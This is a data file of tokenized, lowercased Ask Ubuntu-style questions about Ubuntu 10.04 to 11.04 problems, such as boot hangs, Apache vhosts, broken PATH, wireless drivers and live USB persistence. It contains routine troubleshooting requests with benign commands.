52376	how can i get scponly working again ?	i had a working installation of scponly when i had ubuntu 9.10 , and then i upgraded to 10.04 , as per the advice here : moving information from ubuntu 9.10 server to ubuntu 11.04 however , it appears that scponly is broken in ubuntu 10.04 : https : //bugs.launchpad.net/ubuntu/+source/scponly/+bug/668366 this functionality is absolutely mission critical , and its lack is causing us serious problems . how can i get this functionality back ? edit : i tried the suggestions here : https : //help.ubuntu.com/10.04/serverguide/c/ftp-server.html but all my previous users do n't work anymore either . i really need this to work ...
52380	what causes a newly installed application not to launch when run the first time ?	sometimes when i install a new application and i run it just after it 's installed , i get the bouncing cursor for a while and a button in the task manager bar , and then it just disappears and the application does not run . what causes this to happen ?
52384	how to use moonlight on firefox 5 ?	after i try install the .xpi file on the moonlight homepage , it prompt `` novell moonlight could not be installed because it is not compatible with firefox 5.0 '' . it working fine on chromium , but i want to use it on firefox , can you help me please .
52387	how to detect a file over internet using ping or similar command ?	i have a shell script to download some of my stuff over internet . how can i know if a file exists over the internet ? let 's say i want to know if http : //192.168.1.1/backup/01012011.zip exists or not ? i have try using ping command , but it shows error , i guess this because / character . can anyone can help me ? or is there another way ?
52389	window controls unthemed when window is maximized	i use elementary_unity theme with customize control ( elementary lion 1.1 unity ) and window border ( gekos-leopard-elementary ) and icons awoken theme . in the normal window mode ( not maximize window ) , the button layout is as the same as mac style ( red-yellow-green color ) . however , when click to maximize the window , the button layout has changed ( in ambiance mode ) . i want to keep the same as in the normal window ( mac style ) , and i do n't know how to do . see the pictures i captured for easy understanding . thx for any help !
52393	reboot hangs 100 % - possibly in mountall	update : it seems mountall is hanging inside the routine emit_event ( ) , which it calls after / is remounted to emit an event to that effect . inside emit_event , it calls ply_boot_client_flush ( ) , then constructs the env array , calls upstart_emit_event ( ) , then dbus_pending_call_block ( ) . and there it hangs . so any ideas why dbus_pending_call_block would hang indefinitely ? broken plymouth ? dbus ? upstart ? any suggestions for fixes or further diagnostics ? reboot of my ubuntu 10.04 lts , 64bit amd machine hangs 100 % . the drive access light is off , but the alt-sysreq keys do work . the hardware is a lenovo w700ds laptop . now , i apologize in advance , because i 'm very limited in the information about the system i have available , and in what i can do with it ( because it will not boot ) . i can boot from the 10.04 cd - using it like a rescue disk . i can fsck , mount and read & write to my partitions - they are fine . i already tried reformatting my swap with mkswap . i have 4 ext4 partitions on my system : sda1 is / , sda2 is /usr , sda3 is /home , and a 4th that i use for data storage /sdb1 ( is the entire disk , mounts at the mountpoint /hdb which i created ) . there is also /sda4 which is swap . right now i am writing this from a browser i have opened in the 'rescue session ' from the 10.04 lts install cd . i would greatly appreciate suggestions/comments on what i could do to help diagnose what is hanging , why , and what i could do to fix it . i 've done a websearch already , but found nothing new along these lines ( some 1-1.5 year old bug reports with similar symptoms , but their fixes did not work ) . i installed 10.04 on a new disk around the first of july , then used aptitude to bring everything up to date . since then i 've been installing lots of packages ( i 'll attach the dpkg log below ) . with sda being 750gb ( / 20gb , /usr 80gb ) i had lots of space to install packages that i 'might someday use ' . i wonder if its one of these packages i installed that has screwed up my system ? i installed kernel 2.6.32-32-generic and rebooted , but have installed many more packages since . i reboot this machines as rarely as possible - preferring to hibernate it while going from place to place . lately though , i noticed some strange behavior associated with de-hibernation : when the system would de-hibernate it brings up the gnome screen saver with the a password needed to unlock - well , it would not recognize my password ! i had to alt-f1 , log in as root , and kill the screen saver . then all would be fine , or so it seemed . also , upon de-hibernation i would frequently see for a short while blinking colorful garbage on the screen . it would go away , so i did n't try to find the cause . another possibly relevant point is that i needed to use `` nomodeset '' in the installation of 10.04 , and when bringing up the rescue shell from that same cd , if i use only nomodeset it will eventually hang with a flashing numlock led or caps lock led ( crash ? ) , but if i also use `` noapic nolapic acpi=off '' then it comes up ok . i 've tried these options with my system to see if they cure the boot hang problem - they do not . this is a machine i use for work as well as for nearly everything else , so getting it to boot again is a top priority . /home is intact , which is good . but i 'm about at my wits end in trying to diagnose ( much less fix ) this cause of the hung boot . i boot the system , and it starts running the mountall config script in /etc/init/mountall.conf . i see output from mountall running fsck - 4 lines that say : fsck from util-linux-ng 2.17.2 ( thats one per ext4 partition ) . then there are 4 more lines from fsck informing the user that the partitions were found to be `` clean '' . and that is it - everything just stops . the drive activity led goes off . i can use the alt-sysreq keys , but they have so far not proven useful . i saw a bug report where one user used alt-sysreq-i to kill process and it dropped him into a shell . for me , it does say it has killed processes ( udev and udev-bridge and plymouth , says its respawning udev , etc ) , but i do not get any shell . i have been trying to determine what exactly is hanging . to this end , i 've tinkered with /etc/init/mountall.conf . i have added echo lines , and i have added the -v ( verbose ) option to the exec of mountall . no echo lines after the exec of mountall are shown , so this may mean mountall is hanging . or , it may not be displaying the last of the output - in which case mountall may have exited and something else may be hanging . i note that alt-sysreq-i does not say mountall is killed . i 've tried to narrow down what the system might be hanging on by commenting out sda3 ( /home ) , swap and sdb1 ( /hdb ) from fstab , but it still hangs . there is alot i can do myself , but feel like i 'm in over my head here . i would like to , for example , get the source code for mountall , add printed flags , recompile and stick it on my system - to narrow down a ) if mountall is actually hanging , and b ) what is it hanging on . but , i can not boot my machine to a shell from which to compile within - and the rescue disk environment is only 2.6.32-28-generic # 55 - so it would not match my system . i 'd like to remove or reinstall packages , but again , i can not boot my machine and do this . ( my dpkg log file is several mbs , so i will attach it in a following dialog box ) thanks , greg
52394	how can i determine which font is broken ?	there 's a bug in the way ubuntu displays japanese fonts that i need fixed rather urgently . the bug is that ubuntu displays the wrong japanese characters sometimes . i 'm studying japanese , and having the wrong characters display is obviously problematic . however , as you can see if you look at the most recent comments on the bug report , fixing the bug seems stalled on the fact that some specific fonts are probably broken , but i do n't know which ones . here 's what i think is happening . if japanese text is used in a context where the specified font does not contain japanese characters , then ubuntu defaults to some other font for the words that are written in japanese . however , it is unclear to me what that default japanese font would be , and how i can determine it . is there a way i can determine the default font being used when i see text on my screen that is showing the faulty characters ?
52396	how can i make the workspace switcher in unity 2d show more than one row of workspaces ?	i recently upgraded from ubuntu 10.10 to 11.04 . everything works well except the workspaces refuse to form more than one row and i 'm use to working with a 2x2 grid . the dimensionality of the workspace settings is reflected in the `` desktop expo '' behaviour obtained from the button in the unity dock , but is not in the ctrl-alt- switching . see screenshot : neither the compiz settings ( general options ) nor indicator-workspaces seem to be able to properly fix this . from reading around , most other people are not having this issue . has anyone got some ideas on what has gone wrong and how to fix it ? ( n.b . that i 'm using unity 2d )
52398	how to highlight only file name when renaming file in krusader ?	when i renamed files ( by f2 ) in krusader on ubuntu 10.10 , only the file name got highlighted for renaming , not the file extension . after i upgraded to ubuntu 11.04 , the whole file including extension is highlighted . before ( 10.10 ) : it_crowd_subtitles.srt after ( 11.04 ) : it_crowd_subtitles.srt it 's not a big deal , but i miss the original functionality . is there any way how to set the file highlighting so only the file name gets highlighted when renaming files in krusader ? update : it 's the same on ubuntu 12.04
52400	addressing disk partitions	how do i properly address disk partitions server 11.04 and apache2 i have not found any information ( must be looking in the wrong places ) from the terminal window . example : say define a directory path to another partion and directory as documentroot in virtualhost .
52408	running matlab with gnome-do : bash script problem	in ubuntu , matlab should be started with the following command : setsid matlab -desktop accordingly , i 've created such a bash script : # ! /bin/bash setsid matlab -desktop and saved it as /usr/bin/launchmatlab . now , if i press alt+f2 , type launchmatlab and click run or press enter , matlab is started . however , gnome do , though finds the script , only allows to open , reveal , open terminal and copy to clipboard . execution of the script as a program is allowed . how to make do launch the script ?
52411	how do i streaming rtmp ?	i want to stream with vlc or flvstreamer and the only method that accepts the site i need is smtp , and the only information the server gives me is `` rtmp : //blablabla '' and stream name . help me , please . i do n't know where should i paste these things in vlc . alternatively , could you give examples of how to use flvstreamer ? i have vlc version 1.1.4
52413	method to create a live usb disk ( with persistence ) which actually works ?	i 've tried so many combinations - all i want is a fast ubuntu live usb disk with persistence that works . what i 've tried so far : using unetbootin on my mac , choosing some `` space used to preserve files across reboots ( ubuntu only ) '' . result : does n't boot at all . using unetbootin on my mac , choosing no such space . result : boots fine and very fast ( does n't even show the annoying dialog `` try ubuntu/install ubuntu '' at startup ! ) , but has no persistence . ( so i have to choose my keyboard layout , install programs i need , etc . every time ) using startup disk creator from my ubuntu 11.04 installation . result : i can not choose `` reserved extra space '' at all . it 's greyed out . i know i know , there was bug 557775 , and many people say that the workaround from comment # 4 works for them . but it does n't work with ubuntu 11.04 anymore ( see also comment # 14 ) . using startup disk creator from my kubuntu 10.10 installation , gnome version ( usb-creator-gtk ) . result : i can select the `` reserved extra space '' option , but installation does n't work ( fails when installing the bootloader ) . using startup disk creator from my kubuntu 10.10 installation , kde version ( usb-creator-kde ) . result : actually works : reserved space can be selected , installation works . but after booting , i get the screen `` try ubuntu/install ubuntu '' . clicking on `` try ubuntu '' takes me to the desktop - but only after waiting 5 minutes ( every time ! ) . it also does n't seem to keep my keyboard settings . i know , that instead of creating a startup disk , i could install a full ubuntu system on the usb stick . but as far as i know , this is n't very good , because /tmp and similar directories will then also be on the usb disk , which is a ) slow , and b ) not very good for the usb disk due to frequent overwriting . i 'm frustrated . so has anybody managed to create a working ubuntu 11.04 live usb disk with persistence ?
52420	resume after hibernate : monitor signal out-of-range	i normally shut down the family ubuntu 11.04 pc rather than hibernate , but my daughter did n't realise that and put the machine into hiberate . now when we turn it back on , i see the post output from the machine 's bios , then the monitor just displays `` input signal out of range '' and we ca n't do interact with anything . this state has survived several power-off cycles , so i presume that the os is keeping the hibernated session state somewhere , and because i have n't successfully managed to boot the pc it 's still there . i 'm currently running the machine from a live cd , so i can eliminate hardware failure as a problem . this means i can also make changes to the on-disk installation , but i 'm not sure where to look . where would ubuntu store the hibernated session ? can i just delete that file ? any other suggestions as to how i can , er , restore normality ? : ) as a last resort i can re-install 11.04 , but i 'd like to fix , or at least understand , the problem before i do that .
52422	skype needs two clicks to share desktop	if someone shares their desktop with me using skype it works fine . if i share my ubuntu 11.04 desktop with them it is not successful . i stop desktop sharing - then click on the skype menu to share and on the second click it is successful . could this be a problem with compiz ? once desktop is shared it is responsive and fast . i have all the latest updates applied and use hp laptop with nvidia chip
52424	how to increase space in /home , by adding an extra hdd ?	my current system is laid out across two drives : 40gb for / and /swap ( dev/sdb ) 1tb for /home ( dev/sdc ) as my /home drive is running out of space , and storage is cheap , i 've bought a 2tb drive with the intent of expanding /home across that drive too ( so /home is spread over two drives/3tb ) . i expected this to happen automagically ( though i have no idea why i would expect that , really ) , the drive is installed ( dev/sda ) , formatted as ext4 , but i 've no idea where to go next . is this easy , is there a tool that can do this ? i 've read the following questions : how can i add more disk space to my home directory ? how to mount an internal hdd on start-up ? but i ca n't piece together the advice in such a way that it makes sense to me , or how it enables : expansion of /home , auto-mounts the new drive . i 've been using ubuntu for almost three years , and i still need schoolin ' ... sigh .
52425	adobe flash player is not working in google chrome	i am using ubuntu 11.04 and current versions of google chrome and chromium . but in both of them flash player is not working . i can watch youtube videos properly . in other sites ; it says missing plugin . also i have installed adobe flash player from ubuntu software centre . i have looked for solutions from internet . i found nothing . one of my friends has just installed ubuntu and he says i ca n't watch , too . is there a solution ? or it 's because we use ubuntu in turkish ? what should i do ? it 's becoming really annoying .
52427	exporting passwords	so , i 'm doing a backup of my home folder from elementaryos ( based on ubuntu 10.10 i think ) and got to the point where i wanted to find and save the hidden folder for my passwords ... wifi ones and the like . well as i could n't find it i searched around and found the passwords / keys gui in system > preferences . everything i need seems to be in there but the option to export is greyed out ! can i use this gui as sudo to overcome it ? or is there something even more simple i 'm missing ? if it makes any difference - i have an encrypted system ( just the home folder i think ) thanks for any help - it 's the last step in my backup
52429	ways to convert chm to djvu	i was wondering how to convert chm to djvu ? command line , gui or online solutions are both fine . my os is 10.10 . thanks and regards !
52430	how can i find the location of an icon of a launcher in use ?	i have a launcher on my desktop and want to add another one manually with the same icon . when i go to the preferences of the existing launcher and click the icon , it does n't take me to the folder where the icon is stored but just to my home folder . how can i find out where the used icon of the launcher is located in my system ?
52439	are launchpad bugs in a way moderated ?	is launchpad ( in general ) moderated ? brainstorm is ask ubuntu is ubuntu answers is what about ubuntu bugs ?
52446	where can i find ubuntu one contacts for android ?	i 'm able to stream my music to my android device but i still ca n't sync my contacts . it was impossible for me to find ubuntu one contacts in the android market and funambol does n't seem to work . so where can i find this application
52449	what 's wrong with my icon on the unity-panel ?	after an update of compiz and nvidia-current , my icon on the panel and the firefox auto-scroll icon became mess , like this : what 's the problem ?
52451	asus eee pc 1005peb screen really dark despite brightness set to full	i have here an asus eee pc , model is the 1005peb version . now for the most part it runs fairly decent and quick , not much issue with it except one major one . every time i restart or turn on the netbook my brightness is set to full yet my screen is like almost full on black , like it 's turned off . i turn down the brightness a couple times using the fn + f5/f6 keys and it goes nice and bright etc . when i turn the netbook on i have to turn down my brightness level to see the screen at what ( i think ) is full brightness and it 's then ok . if i turn it off and restart etc i have to do it all over again . down is up kinda thing ... it 's an odd and annoying issue , one that i can not find an answer for anywhere . so if anyone has a solid way of getting it fixed i would be most appreciative . thanks ! i 'm using ubuntu 11.04 , desktop edition , standard grub settings and kernel no changes to any of the hardcore system settings ... i tried ilari kajaste 's suggestion and it had no effect . neither better nor worse . @ fossfreedom i 'll look deeper into your suggestion but at this time it looks almost the same as the second answer so i doubt it is what i currently seek .
52457	distinguishing similar windows when there are some when using unity	if i have similar windows of the same program i 'm having big problems to click on the one i want because their content is similar and i ca n't recognize it when i click to see the list of windows . if i had an ordered list of windows it would be easy to select the first or the third but by default at least the order changes whenever you click on one window . any ideas about how to solve that problem ? if i ca n't i think i will continue with the classic desktop .
52458	is it possible to reboot live cd powered computer ?	i 'm now discovering ubuntu 11.04 to check that its good with my hardware . i need to install some additional stuff and then make reboot . problem is that i use live cd ( or is it called live usb if its usb stick ? ) to `` discover it '' . can i reboot it anyway ?
52461	how to run an app from the command line and carry on working ?	for example , if i want to run netbeans from the cli , i can type : $ /usr/local/netbeans-7.0/bin/netbeans but by doing this , the command line is rendered useless until netbeans has been shut down . hitting ctrl+c to end the process will kill netbeans and return the command line to the user but how do you launch applications while retaining control of the command line ? is it possible to run a task in the background while still using the command line ?
52463	how to set gtk-style and background in gdm3	i 'm triyng to set a different gtk-theme and background for gdm3 ( using ubuntu 11.04 and gnome3 ppa ) . as far as i have seen , the gtk-theme used by gdm is exactly the one stored into gsettings > org.gnome.desktop so , exactly as i do as another user , i tried executing gsettings set org.gnome.desktop.interface gtk-theme adwaita from a shell with gdm logged user . the problem is that it does not change the value of the key into gsettings . how do i get that gdm can change gsettings keys ' values ?
52475	how to prepare auto-updating ppa ?	i have some source code in an svn repo which is updated daily . is there a way to push this source package into a ppa that would update from the svn trunk and build the new packages for me ? or do i need my own mechanism for pushing new source packages for every update from trunk ?
52480	synchronized reader across computers ? okular ?	i 'm reading books in pdf format and use okular to view them . the books are kept in dropbox and available on every computer . is there a way to make okular ( or is there a program for that ) to open them at the same page on every computer ? ( syncing my progress through the book ) thanks !
52481	how to push branchs for different projects ?	i 'm an ubuntu translator and i like to translate .po files locally then push them to a branch . if i 'm working on more than one project and i need to push some changes to them after translation , will i need a separate branch for each project ? for example , i work on translation for totem and nautilus . where should i push the changes to ? a registered branch for each of them ? a single branch ? the project 's branch itself ?
52484	how to get pulseaudio working from chroot ?	i 've got a chroot environment with the same architecture as host environment . i 'm trying to get apps from chroot be able to play sound with pulseaudio . i 've tried the tutorial from arch wiki and http : //blog.einval.com/2010/11/12 , neither of them worked for me . my $ home is set to /root , and i have root permissions in the chroot environment . i get the following error : root @ chroot : / # paplay -v /root/test.wav opening a playback stream with sample specification 's16le 2ch 44100hz ' and channel map 'front-left , front-right ' . connection failure : connection refused pa_context_connect ( ) failed : connection refused edit : i 've just been stupid and assumed /var/lib/dbus/ is mounted in chroot while it was n't mounted . following http : //blog.einval.com/2010/11/12 carefully fixed everything . thanks for your attention .
52487	how can i add a menu item to the right click menu ?	in terminal , if i right-click over a url , a little menu pops up . the first option is `` open link '' . is there any way to add an option to this menu called `` open link in elinks '' ? i 'd like to be able to choose that open and then either launch a new terminal window with elinks or open the url in elinks in the same window .
52491	how can i switch my current session between unity , unity 2d , and gnome ?	if i am currently logged in to unity , is there a way for me to switch my current session to unity 2d or gnome without logging out and in again ? i know i can restart unity by running unity -- replace . is there an equivalent command for unity 2d or gnome that i could run to switch to it ? if i am currently running unity 2d or gnome , will unity -- replace switch me back to unity ?
52493	how do i get my webcam to work ?	since i started using ubuntu ( 9.04 ) i try to get my webcam working , but i never got any success , 2 years passed and i did n't get any progress , then , sometime ago i leave windows out of my computer forever and now i ca n't use my webcam anyway . i ask you : is it time to try developing my own driver to my webcam ? if yes , how i get started on it , i know a bit of writing plugins , extensions , themes , but i 've never got my attention to drivers , so what do you recommend to me ? additional information : lsusb ? ? ? ? : eb1a empia integrated webcam elite group . notebook - asus a3h , celeron m 380 1.6ghz 480mb i have two other external webcams , they are recognized but their resolution is n't fully supported . i remember this lsusb because it was 2 years of tries , but if i try it now in the terminal it actually shows nothing , it stays like processing something and never show any info .
52498	openshot and qbittorrent quits after after being launched	running : kubuntu 11.04x64 both programs quit right after being launched and i get the following errors when running each applications from the terminal : openshot : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- openshot ( version 1.3.0 ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- process no longer exists : 5485 . creating new pid lock file . state saved the program 'openshot ' received an x window system error . this probably reflects a bug in the program . the error was 'badmatch ( invalid parameter attributes ) ' . ( details : serial 25 error_code 8 request_code 132 minor_code 19 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) qbittorrent : qbittorrent : symbol lookup error : qbittorrent : undefined symbol : _zn10libtorrent7sessionc1erkns_11fingerprinteii edit ( 7.13.11 ) : i removed qbittorent from my computer : sudo aptitude purge qbittorrent i removed the getdeb repository from my sources.list file ( actually just commented them out ) , updated my database and reinstalled qbittorrent : sudo aptitude install qbittorrent do n't know why but this application seems to launch properly , with the exact same versions of qbittorrent ( v2.8.2-0 ) and libtorrent-rasterbar6 ( v0.15.6 ) as before . still have the problem with openshot video editor , so could really use help with that if anyone has any ideas as to what the problem is . thank you .
52502	why are unmaintained packages still in the official software sources ?	par example : firestarter which is n't maintained for 4/5 years . easycrypt which is a gui for truecrypt , while truecrypt comes with a outstanding gui for several years now . firestarter bugs : https : //bugs.launchpad.net/ubuntu/+source/firestarter/+bug/42759 easycrypt : https : //bugs.launchpad.net/easycrypt/+bug/374113
52507	how can i get a world clock indicator ?	i am now running ubuntu 11.04 , but i remember that in previous versions of ubuntu you had an interesting functionality in the clock indicator . you could see how late it was in some places in the world different from your current one . this was associated with a world map showing where it was day and where it was not . how can i get this functionality back in the clock indicator ? otherwise , do you advice me another solution to know easily how late it is in some special places ?
52508	how to create a firefox shortcut stored with user and password ?	is it possible to create a firefox shortcut with username and password stored inside ? even if the cookies got cleared the username and password should remain .
52510	understanding hexdump '-e ' option	i 'm trying to understand the formatting option of hexdump . i have read the man page and it says that i can tell it what format to output the data in by using the -e option . however , i can not for the life of me understand the code for the option . for now , i 'm just trying to have it print random lines from /dev/random like this : 6568:6c6c:7565:7568:2e62:716d:2e2c:7563 ( basically , a psuedo ipv6 address . ) however , i would really like to understand the formatting strings , not just have one that does the trick . i have tried reading the man page and it was n't much help -- it seemed to refer to it being similar to c code . well , i have almost no experience with c , so i 'm stuck . can somebody please explain this ?
52511	install intel onboard graphic driver in asus k53sv ?	from the first time installing ubuntu , i can not enable desktop effects . my laptop is asus k53sv core i7 sb with hybrid graphic card intel hd 3000/ nvidia 540 gm . after installing bumblebee , i still ca n't enable it . i 've found these links : http : //intellinuxgraphics.org/download.html and http : //intellinuxgraphics.org/2011q1.html which said `` this release has been validated on following hardware : sandy bridge hd graphics 3000 core i7 2630qm '' how could i reinstall intel onboard driver this way ? i need details . if there is another , how to do that ?
52512	download picasa web photos without picasa	i am using natty . i want to download or sync all of my picasa web photos on my disk . i know that using picasa i can do the same . but i do not want to use old ( non - updated ) version of picasa . ( plus its 30mb and requires another 60mb of downloading when installing via ubuntu software center ) . could you please tell me , how can i sync the photos using shotwell or any other light weight photo viewer/manager .
52519	vhost not working in apache	i got a lamp server working in ubuntu 11.04 . now the problem is that the websites have to enabled and disabled from the terminal . all all of them have to be accessed from http : //localhost which is not so much efficient . so i created a vhosts , using some tutorials off the net . here is the coding for it < virtualhost *:80 > serveradmin webmaster @ localhost servername site.com serveralias www.site.com documentroot /home/starx/public_html/site/public < directory / > options followsymlinks allowoverride none < /directory > < directory /home/starx/public_html/site/public > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > ngen errorlog $ { apache_log_dir } /site-error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /site-access.log combined alias /doc/ `` /usr/share/doc/ '' < directory `` /usr/share/doc/ '' > options indexes multiviews followsymlinks allowoverride none order deny , allow deny from all allow from 127.0.0.0/255.0.0.0 : :1/128 < /directory > < /virtualhost > now , still i ca n't access the page in http : //site.com but if i access using http : //localhsot/ it is accessed . i have disabled all others site including default and have just enabled one site i.e . site how to fix this ?
52521	how to apply patch to rt2x00 driver for ralink rt5390 support	i have a pavilion dm1 , with a known issue with the rt2x00 driver . there is a one line patch that fixes the issue . how do i apply it ?
52523	errors shown in terminal when editing files with gedit	when editing any file f.e . like this : r @ ngf : ~ $ sudo gedit /etc/default/grub [ sudo ] password for r : ( gedit:1638 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : не удалось создать файл «/root/.local/share/recently-used.xbel.cjp8xv» : нет такого файла или каталога ( gedit:1638 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : нет такого файла или каталога ( gedit:1638 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : не удалось создать файл «/root/.local/share/recently-used.xbel.w8mhyv» : нет такого файла или каталога ( gedit:1638 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : нет такого файла или каталога ( gedit:1638 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : не удалось создать файл «/root/.local/share/recently-used.xbel.dzg7xv» : нет такого файла или каталога ( gedit:1638 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : нет такого файла или каталога it is shows some errors , but this does n't affect on the editing actually -- files saves normally . so what that errors could mean ?
52537	saturation and contrast settings for wine programs	i know that i can change contrast and saturation with nvidia-settings . how can i make different settings for different apps ( i.e . wine ) using nvidia-settings or any other tool ?
52545	.php files are downloaded instead of being parsed by apache	i have xampp on ubuntu 11.04 . .php files are downloaded instead of parsed by apache ! how do i get apache to parse them ?
52549	how do i update when using a development release ?	i 've installed 11.10 alpha2 in a virtual machine ( virtualbox ) . i know there are updates since i installed it , about a week ago , but when i try sudo apt-get upgrade or sudo apt-get dist-upgrade it does n't find any updates . so my question , is there any special way for upgrading alpha releases ? what about betas ?
52556	headless machine : increase remote desktop resolution	i have a headless ubuntu machine that i connect to with a combination of ssh and vnc . when i 've got a monitor attached ( which is rare ) , the vnc connection is the full resolution of the attached monitor ( of course ) . but , when i connect using vnc when there 's no monitor connected , i get a much lower-resolution connection than i would like . it 's as if the computer has a tiny monitor connected . i have looked through settings and have n't found anything promising ( resolution was grayed out without a monitor connected ) . how can i change the 'virtual resolution ' that i get when i connect using vnc ? update : i 'm not interested in recommendations for other vnc software now , i just want to know how to do the above with the built-in vnc server . thanks .
52562	start the same `` sessions '' after shutdown	many times it happen i got several terms & app sessions opened , while i just have to quick shutdown the machine to move away in another building . is there a way , when i next boot the laptop , to have back all my `` un-closed '' sessions ( terms & apps ) , if i did shutdown without exit ? ( no freeze , no hibernate but real restart )
52564	accessing the terminal from gnome without a mouse	i have a new lenovo g560e , and have just installed ubuntu 10.04 . but the laptop 's trackpad does not work ! https : //wiki.ubuntu.com/debugginghardwaredetection suggests some commands to run before reporting a hardware issue -- but my immediate problem is that i ca n't work out how to access the terminal from gnome without a mouse ! any help / suggestions would be gratefully received .
52569	how can i customize my kernel configuration ?	how can i customize my kernel configuration ? i mean use same kernel version as ubuntu offered .
52570	missing xorg.conf in kubuntu 11.04	i am new to kubuntu 11.04 and needs some helps from you guys . i tried to modify xorg.conf so i can get my logitech trackball mouse to work properly in kubuntu . as far as i know , the path to xorg.conf is /etc/x11/xorg.conf . however , i could n't find it there . anyone knows where it is or what i should do next ? thanks a lot .
52584	shared folders for all users	i have a /data folder ( actually a partition ) for all data that should be accessible by all users ( in this case family members ) . we all have individual user accounts and are often all logged in at any time on this one pc . how can i set up permissions so that we all retain access to files there no matter who creates them , including new folders ? if i create a folder it gets my user and group , so nobody else can write to it .
52585	coping contents of folder across multiple data storages ( hdd , external hdd )	i 'm looking for some utility that will copy the contents of my working folder across multiple storages - hdd , external hdd , usb drives etc . i`m not looking for version control software ( like cvs or svn ) , more like replication control on data changed in the folder . can you suggest something ? thanks in advance
52593	unable to delete files from drive in banshee	when i imported all of my music from my ipod into banshee , i got all of the wrong music , so i decided to delete it all . now it says that there is no such file or directory , so it wo n't delete the music . now i have low disk space . thanks in advance for anyone who can help ...
52595	unity stop working after disk ( or drive ) error	unity worked perfectly in my laptop before . however , today when i hard rebooted my laptop , there 's something like disk/drive error detect before the login screen . i waited until the disk/drive check finished and then login . now there 's a pop up saying : `` it seems that you do not have the hardware required to run unity . please choose ubuntu classic at the login screen ... '' , then unity did not work anymore . it turned back to ubuntu classic automatically , and i could not use any effect . any idea about what happened ? how can i get it back ? it happened the same before , and it turned into worse after that and i have to re-install ubuntu . that 's why i 'm so desperate . please help . lspci | grep vga returns : intel corporation mobile 4 series chipset integrated graphics controller .
52596	how do i connect to ubuntu one after changing the password ?	i changed my password for ubuntu one using the web interface , and added a new computer . since then , the old computer does not synchronize with ubuntu one . it does n't show any error messages or such , but files uploaded from the web interface or changed on the newly added computer do n't appear/change on the old computer . i guess that it ca n't connect because it is still using the old password . the problem is that i ca n't find an interface to change the password the client is using to connect to the service . the `` manage account '' option opens the web interface . i looked into the keyring , and found the key for ubuntu one , but there i only see an encrypted version of the password , so i ca n't change it there . so what is the correct way to tell my client that my account password has changed ? edit this is what i see when i open preferences -- > ubuntu one . is there something wrong with it ? it also stubbornly insists that it has successfully synchronized . but the files i have added from other computers are not in my ubuntu one folder .
52597	i would like to know where can i find the azureus2.jar file	i 'm trying to find this file of vuze ( known as azureus ) but seems not to be present . ( vuze works , but i wish know where this file is ) . i 've already tried to search for it with search on local disk , but unsuccesfully .
52600	unity wo n't start on login	i installed ubuntu 11.04 on 2 laptops today . one of a friend , and one of my own . both have nvidia graphics cards . this went the same on both computers . when you login the first time you get a message wich is basically telling you to install the nvidia drivers . however , when i restarted after installing the new driver on my friend 's laptop , unity just worked . when i installed the drivers on my laptop , and rebooted , it just booted straight back into the ubuntu classic desktop environment . in the sessions list at the login screen , there are the following items : ubuntu , ubuntu classic , ubuntu classic ( no effects ) , user defined , recovery console . i have n't touched this setting , as it seems to me that ubuntu should be correct . appart from that when i login i still get the ubuntu classic environment ( without the message telling me that unity could n't be started ) when i run compiz -- replace manually , i get the unity interface ... but it instantly freezes . so why does n't it start the unity interface ? my graphics card is an nvidia quadro nvs 110m , wich has always worked fluently with compiz fusion .
52604	freeze when i open chromium while minecraft is full screen ?	so far i 've had my computer freeze three times because i opened either chromium , or skype over top of a full screen minecraft window . it has frozen when it was running unity and when it was running the classic desktop environment . also i was running a minecraft server at those times and ended up losing my map due to the last freeze-up . ubuntu 11.04 natty narwhal mac mini kernel : 2.6.38
52609	screwed up my .bashrc file	i was trying to add the source command at the end so that i dont have to enter it in the command line each session , the addition i made was , in the end of the file , # load root files source /home/user/file/blah/blah/thisroot.sh it seems i goofed up . as now when i run the standard command to run the program , i get user @ user-laptop : ~ $ root -l bash : /home/user/downloads/root/bin/root : no such file or directory i thought i might just revert whatever changes i made . but now i can not even open the .bashrc file . $ emacs .bashrc & [ 1 ] 2478 user @ user-laptop : ~ $ command 'emacs ' is available in '/usr/bin/emacs' the command could not be located because '/usr/bin ' is not included in the path environment variable . emacs : command not found now you can probably realize by all this that i am quite the n00b here . please help me out . thanks .
52611	i think i accidently deleted the path variable	whatever i try to run , i get the error : the command could not be located because '/usr/bin ' is not included in the path environment variable . i had some modification in my .bashrc file but then removed the two additional lines afterwards . however somehow the path variable seems to have been destroyed .
52613	`` device not ready '' error with broadcom wireless card	i have a lenovo thinkpad edge e520 ( 1143cto ) and i 'm having problems getting my wireless nic to work , as far as i can tell the drivers and firmware are all installed and the device is working . i have searched around and have done all the fixes i can find online , this is my first 'real ' experience with linux , so patience is appreciated , as is any help i can get . i also had this problem with linux mint 11 . it appears that the model of my card is bcm43224 , but it does n't show up anywhere in the with any commands ? sudo lshw *-network disabled description : wireless interface product : broadcom corporation vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth2 version : 01 serial : ac:81:12:3e:1d : ca width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 latency=0 multicast=yes wireless=ieee 802.11abgn resources : irq:19 memory : e1d00000-e1d03fff sudo lspci 09:00.0 network controller : broadcom corporation device 0576 ( rev 01 ) i have tried the broadcom sta drivers and have also tried the command : sudo apt-get install b43-fwcutter firmware-b43-installer sudo rfkill list 0 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no yet , sudo lshw still shows it as disabled ! 